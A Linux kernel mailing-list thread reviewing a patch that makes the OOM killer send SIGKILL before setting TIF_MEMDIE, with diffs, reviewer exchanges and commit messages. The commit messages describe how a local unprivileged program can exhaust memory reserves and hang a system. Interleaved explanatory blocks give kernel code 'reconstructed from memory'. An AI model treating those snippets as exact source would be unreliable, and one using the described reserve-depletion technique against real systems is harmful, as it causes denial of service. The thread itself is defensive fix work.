> -	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
>  	put_task_struct(victim);
>  }
>  #undef K
>
> then yes, I can still trigger the issue under a very limited condition (i.e.
> running as the root user, polling kernel messages with realtime priority, after
> killing all processes using SysRq-i).
Yes, that's why I also said that preempt_{enable,disable} around it could
be used:
diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 1ecc0bcaecc5..331c8ac23cc6 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -542,8 +542,15 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	}
 	read_unlock(&tasklist_lock);
 
+	/*
+	 * Make sure that nobody preempts us between the victim getting
+	 * access to the memory reserves and getting killed. It could
+	 * deplete the memory reserves otherwise.
+	 */
+	preempt_disable();
 	p = find_lock_task_mm(victim);
 	if (!p) {
+		preempt_enable();
 		put_task_struct(victim);
 		return;
 	} else if (victim != p) {
@@ -560,6 +567,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
 		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
 	task_unlock(victim);
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
+	preempt_enable();
 
 	/*
 	 * Kill all user processes sharing victim->mm in other thread groups, if
@@ -585,7 +594,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	put_task_struct(victim);
 }
 #undef K
[...]
> > The code would be simpler then and the race window much smaller. If we
> > really needed to prevent preemption then preempt_{enable,disable}
> > around the whole task_lock region + do_send_sig_info would still be
> > easier to follow than re-taking task_lock.
>
> What's wrong with re-taking task_lock? It seems to me that re-taking
> task_lock is more straightforward and easier to follow.
I dunno, it looks more awkward to me. You have to re-check victim->mm
after retaking the lock because the situation might have changed while the
lock was dropped. If mark_oom_victim & do_send_sig_info are in the
same preempt region then nothing like that is needed. But this is
probably a matter of taste. I find the above more readable, but let's see
what others think.
--
Michal Hocko
SUSE Labs
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
From: Tetsuo Handa @ 2015-08-25 14:37 UTC
To: mhocko; +Cc: rientjes, hannes, linux-mm
Michal Hocko wrote:
> > > The code would be simpler then and the race window much smaller. If we
> > > really needed to prevent preemption then preempt_{enable,disable}
> > > around the whole task_lock region + do_send_sig_info would still be
> > > easier to follow than re-taking task_lock.
> >
> > What's wrong with re-taking task_lock? It seems to me that re-taking
> > task_lock is more straightforward and easier to follow.
>
> I dunno, it looks more awkward to me. You have to re-check victim->mm
> after retaking the lock because the situation might have changed while the
> lock was dropped. If mark_oom_victim & do_send_sig_info are in the
> same preempt region then nothing like that is needed. But this is
> probably a matter of taste. I find the above more readable, but let's see
> what others think.
Disabling preemption does not guarantee that the race window is small enough.
If we set TIF_MEMDIE before sending SIGKILL, long interrupts (an extreme
example is SysRq-t from the keyboard, which can last many seconds) can step
in between. We will spend some percentage (in the worst case, 100 percent) of
the memory reserves on allocations which are not needed for termination.
If we send SIGKILL before setting TIF_MEMDIE, we will spend 0 percent of the
memory reserves on allocations which are not needed for termination.
Memory reserves are limited, and thus we don't want to waste any pages.
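For context on why TIF_MEMDIE is so powerful here: the page allocator
grants ALLOC_NO_WATERMARKS to any task that has the flag set. The
following is a paraphrased sketch of the relevant branch of
gfp_to_alloc_flags() in mm/page_alloc.c from kernels of this era
(reconstructed from memory, so treat it as illustrative rather than as
the exact source):

	if (likely(!(gfp_mask & __GFP_NOMEMALLOC))) {
		if (gfp_mask & __GFP_MEMALLOC)
			alloc_flags |= ALLOC_NO_WATERMARKS;
		else if (in_serving_softirq() && (current->flags & PF_MEMALLOC))
			alloc_flags |= ALLOC_NO_WATERMARKS;
		else if (!in_interrupt() &&
			 ((current->flags & PF_MEMALLOC) ||
			  unlikely(test_thread_flag(TIF_MEMDIE))))
			/* an OOM victim may ignore all watermarks */
			alloc_flags |= ALLOC_NO_WATERMARKS;
	}

Every allocation the victim performs between mark_oom_victim() and the
delivery of SIGKILL takes the TIF_MEMDIE branch and may dip into the
memory reserves, which is why the length of that window matters at all.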
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
2015-08-25 14:37 ` Tetsuo Handa
@ 2015-08-25 15:20 ` Michal Hocko
0 siblings, 0 replies; 14+ messages in thread
From: Michal Hocko @ 2015-08-25 15:20 UTC (permalink / raw)
To: Tetsuo Handa; +Cc: rientjes, hannes, linux-mm
On Tue 25-08-15 23:37:27, Tetsuo Handa wrote:
> Michal Hocko wrote:
> > > > The code would be easier then and the race window much smaller. If we
> > > > really needed to prevent preemption then preempt_{enable,disable}
> > > > around the whole task_lock region + do_send_sig_info would still be
> > > > easier to follow than re-taking task_lock.
> > >
> > > What's wrong with re-taking task_lock? It seems to me that re-taking
> > > task_lock is more straightforward and easier to follow.
> >
> > I dunno, it looks more awkward to me. You have to re-check the victim->mm
> > after retaking the lock because the situation might have changed while
> > the lock was dropped. If the mark_oom_victim & do_send_sig_info are in
> > the same preempt region then nothing like that is needed. But this is
> > probably a matter of taste. I find the above more readable, but let's
> > see what others think.
>
> Disabling preemption does not guarantee that the race window is small enough.
>
> If we set TIF_MEMDIE before sending SIGKILL, long interrupts (an extreme
> example is SysRq-t from the keyboard, which can last many seconds) can step
> in between. We will spend some percentage (in the worst case, 100 percent)
> of the memory reserves on allocations which are not needed for termination.
I wouldn't be worried about SysRq-t because that requires the
administrator, and IRQs normally shouldn't take too long. But I guess
you are right that this will be inherently less fragile in the long
term. All other callers of mark_oom_victim except for lowmem_scan are
safe. Could you update the lmk as well, please?
--
Michal Hocko
SUSE Labs
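For reference, the lmk caller mentioned above is lowmem_scan() in
drivers/staging/android/lowmemorykiller.c. A minimal sketch of the
analogous reordering there, assuming the v4.2-era structure of that
driver (the surrounding context is reconstructed from memory, so treat
it as illustrative):

	task_lock(selected);
	/* Send SIGKILL before setting TIF_MEMDIE, as in oom_kill_process(). */
	send_sig(SIGKILL, selected, 0);
	if (selected->mm)
		mark_oom_victim(selected);
	task_unlock(selected);

Whether a signal may be sent at all while task_lock is held is the same
question that comes up for do_send_sig_info() later in this thread.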
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
2015-08-23 7:19 [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL Tetsuo Handa
2015-08-24 9:47 ` Michal Hocko
@ 2015-08-26 14:12 ` Michal Hocko
2015-08-26 14:28 ` Oleg Nesterov
2015-08-26 15:03 ` Tetsuo Handa
2 siblings, 1 reply; 14+ messages in thread
From: Michal Hocko @ 2015-08-26 14:12 UTC (permalink / raw)
To: Oleg Nesterov; +Cc: Tetsuo Handa, rientjes, hannes, linux-mm
Hi Oleg,
On Sun 23-08-15 16:19:38, Tetsuo Handa wrote:
[...]
> diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> index 5249e7e..c0a5a69 100644
> --- a/mm/oom_kill.c
> +++ b/mm/oom_kill.c
> @@ -555,12 +555,17 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  	/* Get a reference to safely compare mm after task_unlock(victim) */
>  	mm = victim->mm;
>  	atomic_inc(&mm->mm_users);
> -	mark_oom_victim(victim);
>  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
>  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
>  		K(get_mm_counter(victim->mm, MM_ANONPAGES)),
>  		K(get_mm_counter(victim->mm, MM_FILEPAGES)));
>  	task_unlock(victim);
> +	/* Send SIGKILL before setting TIF_MEMDIE. */
> +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
> +	task_lock(victim);
> +	if (victim->mm)
> +		mark_oom_victim(victim);
> +	task_unlock(victim);
I cannot seem to find any explicit note about nesting task_lock with
signal delivery, nor any use of task_lock() anywhere in kernel/signal.c,
so I would rather ask: can we call do_send_sig_info() with task_lock held?
Thanks!
--
Michal Hocko
SUSE Labs
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
2015-08-26 14:12 ` Michal Hocko
@ 2015-08-26 14:28 ` Oleg Nesterov
2015-08-27 8:38 ` Michal Hocko
0 siblings, 1 reply; 14+ messages in thread
From: Oleg Nesterov @ 2015-08-26 14:28 UTC (permalink / raw)
To: Michal Hocko; +Cc: Tetsuo Handa, rientjes, hannes, linux-mm
Hi Michal,
On 08/26, Michal Hocko wrote:
>
> I cannot seem to find any explicit note about nesting task_lock with
> signal delivery, nor any use of task_lock() anywhere in kernel/signal.c,
> so I would rather ask: can we call do_send_sig_info() with task_lock held?
Yes.
Simply because task_lock() doesn't disable irqs and (unfortunately ;)
we do send the signals from interrupts.
Oleg.
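To make the reasoning concrete: task_lock() is a plain spin_lock on the
task's alloc_lock and does not disable interrupts, while the signal
delivery path takes sighand->siglock with interrupts disabled. Since
signals must be deliverable from IRQ context, the signal path cannot
itself depend on task_lock(), so taking task_lock() around
do_send_sig_info() cannot deadlock. Paraphrased excerpts from
include/linux/sched.h and kernel/signal.c of this era (reconstructed
from memory, for illustration only):

	static inline void task_lock(struct task_struct *p)
	{
		spin_lock(&p->alloc_lock);	/* does not disable IRQs */
	}

	int do_send_sig_info(int sig, struct siginfo *info,
			     struct task_struct *p, bool group)
	{
		unsigned long flags;
		int ret = -ESRCH;

		/* lock_task_sighand() takes siglock with spin_lock_irqsave() */
		if (lock_task_sighand(p, &flags)) {
			ret = send_signal(sig, info, p, group);
			unlock_task_sighand(p, &flags);
		}
		return ret;
	}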
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
2015-08-23 7:19 [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL Tetsuo Handa
2015-08-24 9:47 ` Michal Hocko
2015-08-26 14:12 ` Michal Hocko
@ 2015-08-26 15:03 ` Tetsuo Handa
2015-08-27 8:40 ` Michal Hocko
2 siblings, 1 reply; 14+ messages in thread
From: Tetsuo Handa @ 2015-08-26 15:03 UTC (permalink / raw)
To: mhocko, rientjes, hannes; +Cc: linux-mm
Reposting an updated version, as it turned out that we can call
do_send_sig_info() with task_lock held. ;-)
( http://marc.info/?l=linux-mm&m=144059948628905&w=2 )
----------------------------------------
From 69489b37171d9a84ccbb00e7441f8f73bc526e11 Mon Sep 17 00:00:00 2001
From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Date: Wed, 26 Aug 2015 23:54:12 +0900
Subject: [PATCH] mm,oom: Reverse the order of setting TIF_MEMDIE and sending
SIGKILL.
It is observed that a multi-threaded program can deplete memory reserves
using the time lag between the moment the OOM killer sets TIF_MEMDIE and
the moment it sends SIGKILL. This is because the thread group leader that
gets TIF_MEMDIE receives SIGKILL too late when many child threads share
the same memory, for the printk() calls inside the for_each_process()
loop can take many seconds.
Before starting oom-depleter process:
Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
As of invoking the OOM killer:
Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
Between the time the thread group leader got TIF_MEMDIE and the time it received SIGKILL:
Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
The oom-depleter's thread group leader, which got TIF_MEMDIE, started
memset() in user space after the OOM killer set TIF_MEMDIE, and it
was free to abuse ALLOC_NO_WATERMARKS via TIF_MEMDIE for that memset()
until SIGKILL was delivered. If SIGKILL is delivered before TIF_MEMDIE
is set, the oom-depleter can terminate without touching the memory
reserves.
Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
---
mm/oom_kill.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 5249e7e..408aa8e 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -555,6 +555,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	/* Get a reference to safely compare mm after task_unlock(victim) */
 	mm = victim->mm;
 	atomic_inc(&mm->mm_users);
+	/* Send SIGKILL before setting TIF_MEMDIE. */
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mark_oom_victim(victim);
 	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
 		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
@@ -586,7 +588,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mmput(mm);
 	put_task_struct(victim);
 }
--
1.8.3.1
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
2015-08-26 14:28 ` Oleg Nesterov
@ 2015-08-27 8:38 ` Michal Hocko
0 siblings, 0 replies; 14+ messages in thread
From: Michal Hocko @ 2015-08-27 8:38 UTC (permalink / raw)
To: Oleg Nesterov; +Cc: Tetsuo Handa, rientjes, hannes, linux-mm
On Wed 26-08-15 16:28:52, Oleg Nesterov wrote:
> Hi Michal,
>
> On 08/26, Michal Hocko wrote:
> >
> > I cannot seem to find any explicit note about nesting task_lock with
> > signal delivery, nor any use of task_lock() anywhere in kernel/signal.c,
> > so I would rather ask: can we call do_send_sig_info() with task_lock held?
>
> Yes.
>
> Simply because task_lock() doesn't disable irqs and (unfortunately ;)
> we do send the signals from interrupts.
Good point. Thanks!
--
Michal Hocko
SUSE Labs
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
2015-08-26 15:03 ` Tetsuo Handa
@ 2015-08-27 8:40 ` Michal Hocko
2015-08-27 11:11 ` Tetsuo Handa
0 siblings, 1 reply; 14+ messages in thread
From: Michal Hocko @ 2015-08-27 8:40 UTC (permalink / raw)
To: Tetsuo Handa; +Cc: rientjes, hannes, linux-mm
On Thu 27-08-15 00:03:13, Tetsuo Handa wrote:
> Reposting an updated version, as it turned out that we can call
> do_send_sig_info() with task_lock held. ;-)
> ( http://marc.info/?l=linux-mm&m=144059948628905&w=2 )
> ----------------------------------------
> From 69489b37171d9a84ccbb00e7441f8f73bc526e11 Mon Sep 17 00:00:00 2001
> From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
> Date: Wed, 26 Aug 2015 23:54:12 +0900
> Subject: [PATCH] mm,oom: Reverse the order of setting TIF_MEMDIE and sending
> SIGKILL.
>
> It is observed that a multi-threaded program can deplete memory reserves
> using the time lag between the moment the OOM killer sets TIF_MEMDIE and
> the moment it sends SIGKILL. This is because the thread group leader that
> gets TIF_MEMDIE receives SIGKILL too late when many child threads share
> the same memory, for the printk() calls inside the for_each_process()
> loop can take many seconds.
>
> Before starting oom-depleter process:
>
> Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
> Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
>
> As of invoking the OOM killer:
>
> Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
> Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
>
> Between the time the thread group leader got TIF_MEMDIE and the time it received SIGKILL:
>
> Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
> Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
>
> The oom-depleter's thread group leader, which got TIF_MEMDIE, started
> memset() in user space after the OOM killer set TIF_MEMDIE, and it
> was free to abuse ALLOC_NO_WATERMARKS via TIF_MEMDIE for that memset()
> until SIGKILL was delivered. If SIGKILL is delivered before TIF_MEMDIE
> is set, the oom-depleter can terminate without touching the memory
> reserves.
The comment could have been a bit better because it doesn't explain
why, but this is much, much better.
> Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Acked-by: Michal Hocko <mhocko@suse.com>
I guess you want to add Andrew to the CC, because he might easily miss
it this way.
I would also consider marking this for stable.
Thanks!
> ---
> mm/oom_kill.c | 3 ++-
> 1 file changed, 2 insertions(+), 1 deletion(-)
>
> diff --git a/mm/oom_kill.c b/mm/oom_kill.c
> index 5249e7e..408aa8e 100644
> --- a/mm/oom_kill.c
> +++ b/mm/oom_kill.c
> @@ -555,6 +555,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  	/* Get a reference to safely compare mm after task_unlock(victim) */
>  	mm = victim->mm;
>  	atomic_inc(&mm->mm_users);
> +	/* Send SIGKILL before setting TIF_MEMDIE. */
> +	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
>  	mark_oom_victim(victim);
>  	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
>  		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
> @@ -586,7 +588,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
>  	}
>  	rcu_read_unlock();
> 
> -	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
>  	mmput(mm);
>  	put_task_struct(victim);
>  }
> --
> 1.8.3.1
--
Michal Hocko
SUSE Labs
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
2015-08-27 8:40 ` Michal Hocko
@ 2015-08-27 11:11 ` Tetsuo Handa
2015-08-27 11:34 ` Michal Hocko
0 siblings, 1 reply; 14+ messages in thread
From: Tetsuo Handa @ 2015-08-27 11:11 UTC (permalink / raw)
To: mhocko; +Cc: akpm, rientjes, hannes, linux-mm
Michal Hocko wrote:
> The comment could have been a bit better because it doesn't explain
> why, but this is much, much better.
>
> I guess you want to add Andrew to the CC, because he might easily miss
> it this way.
>
> I would also consider marking this for stable.
>
OK. Here is an updated patch. Can you carry this patch through your git
tree (because this patch depends on the previous "[PATCH 1/2] mm,oom: Fix
potentially killing unrelated process.")?
----------
From e9077d84d9d1e32b91b8e44534dd6fab494bbbe2 Mon Sep 17 00:00:00 2001
From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Date: Thu, 27 Aug 2015 19:26:35 +0900
Subject: [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
It was confirmed that a local unprivileged user can consume all memory
reserves and hang up the system using the time lag between the moment
the OOM killer sets TIF_MEMDIE on an OOM victim and the moment it sends
SIGKILL to that victim, for the printk() calls inside the
for_each_process() loop in oom_kill_process() can take many seconds when
there are many thread groups sharing the same memory.
Before starting oom-depleter process:
Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
As of invoking the OOM killer:
Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
Between the time the thread group leader got TIF_MEMDIE and the time it received SIGKILL:
Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
The oom-depleter's thread group leader, which got TIF_MEMDIE, started
memset() in user space after the OOM killer set TIF_MEMDIE, and it
was free to abuse ALLOC_NO_WATERMARKS via TIF_MEMDIE for that memset()
until SIGKILL was delivered. If SIGKILL is delivered before TIF_MEMDIE
is set, the oom-depleter can terminate without touching the memory
reserves.
Although the possibility of hitting this time lag is very small for 3.19
and earlier kernels, because TIF_MEMDIE is set immediately before sending
SIGKILL, preemption or long interrupts (an extreme example is SysRq-t)
can step in between and allow memory allocations which are not needed
for terminating the OOM victim.
Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Acked-by: Michal Hocko <mhocko@suse.com>
Cc: stable <stable@vger.kernel.org> [4.0+]
Cc: Andrew Morton <akpm@linux-foundation.org>
---
mm/oom_kill.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 5249e7e..408aa8e 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -555,6 +555,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	/* Get a reference to safely compare mm after task_unlock(victim) */
 	mm = victim->mm;
 	atomic_inc(&mm->mm_users);
+	/* Send SIGKILL before setting TIF_MEMDIE. */
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mark_oom_victim(victim);
 	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
 		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
@@ -586,7 +588,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mmput(mm);
 	put_task_struct(victim);
 }
--
1.8.3.1
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
2015-08-27 11:11 ` Tetsuo Handa
@ 2015-08-27 11:34 ` Michal Hocko
2015-08-27 14:03 ` Tetsuo Handa
0 siblings, 1 reply; 14+ messages in thread
From: Michal Hocko @ 2015-08-27 11:34 UTC (permalink / raw)
To: Tetsuo Handa; +Cc: akpm, rientjes, hannes, linux-mm
On Thu 27-08-15 20:11:24, Tetsuo Handa wrote:
> Cc: stable <stable@vger.kernel.org> [4.0+]
Please also add
Fixes: 83363b917a29 ("oom: make sure that TIF_MEMDIE is set under
task_lock")
--
Michal Hocko
SUSE Labs
* Re: [REPOST] [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
2015-08-27 11:34 ` Michal Hocko
@ 2015-08-27 14:03 ` Tetsuo Handa
0 siblings, 0 replies; 14+ messages in thread
From: Tetsuo Handa @ 2015-08-27 14:03 UTC (permalink / raw)
To: mhocko; +Cc: akpm, rientjes, hannes, linux-mm
Michal Hocko wrote:
> On Thu 27-08-15 20:11:24, Tetsuo Handa wrote:
> > Cc: stable <stable@vger.kernel.org> [4.0+]
>
> Please also add
> Fixes: 83363b917a29 ("oom: make sure that TIF_MEMDIE is set under
> task_lock")
I think you can do it like some maintainers do...
------------------------------------------------------------
From e9077d84d9d1e32b91b8e44534dd6fab494bbbe2 Mon Sep 17 00:00:00 2001
From: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Date: Thu, 27 Aug 2015 19:26:35 +0900
Subject: [PATCH 2/2] mm,oom: Reverse the order of setting TIF_MEMDIE and sending SIGKILL.
It was confirmed that a local unprivileged user can consume all memory
reserves and hang up the system using the time lag between the moment
the OOM killer sets TIF_MEMDIE on an OOM victim and the moment it sends
SIGKILL to that victim, for the printk() calls inside the
for_each_process() loop in oom_kill_process() can take many seconds when
there are many thread groups sharing the same memory.
Before starting oom-depleter process:
Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
As of invoking the OOM killer:
Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
Between the time the thread group leader got TIF_MEMDIE and the time it received SIGKILL:
Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
The oom-depleter's thread group leader, which got TIF_MEMDIE, started
memset() in user space after the OOM killer set TIF_MEMDIE, and it
was free to abuse ALLOC_NO_WATERMARKS via TIF_MEMDIE for that memset()
until SIGKILL was delivered. If SIGKILL is delivered before TIF_MEMDIE
is set, the oom-depleter can terminate without touching the memory
reserves.
Although the possibility of hitting this time lag is very small for 3.19
and earlier kernels, because TIF_MEMDIE is set immediately before sending
SIGKILL, preemption or long interrupts (an extreme example is SysRq-t)
can step in between and allow memory allocations which are not needed
for terminating the OOM victim.
Signed-off-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Acked-by: Michal Hocko <mhocko@suse.com>
Cc: stable <stable@vger.kernel.org> [4.0+]
Fixes: 83363b917a29 ("oom: make sure that TIF_MEMDIE is set under task_lock")
Cc: Andrew Morton <akpm@linux-foundation.org>
---
mm/oom_kill.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/mm/oom_kill.c b/mm/oom_kill.c
index 5249e7e..408aa8e 100644
--- a/mm/oom_kill.c
+++ b/mm/oom_kill.c
@@ -555,6 +555,8 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	/* Get a reference to safely compare mm after task_unlock(victim) */
 	mm = victim->mm;
 	atomic_inc(&mm->mm_users);
+	/* Send SIGKILL before setting TIF_MEMDIE. */
+	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mark_oom_victim(victim);
 	pr_err("Killed process %d (%s) total-vm:%lukB, anon-rss:%lukB, file-rss:%lukB\n",
 		task_pid_nr(victim), victim->comm, K(victim->mm->total_vm),
@@ -586,7 +588,6 @@ void oom_kill_process(struct oom_control *oc, struct task_struct *p,
 	}
 	rcu_read_unlock();
 
-	do_send_sig_info(SIGKILL, SEND_SIG_FORCED, victim, true);
 	mmput(mm);
 	put_task_struct(victim);
 }
--
1.8.3.1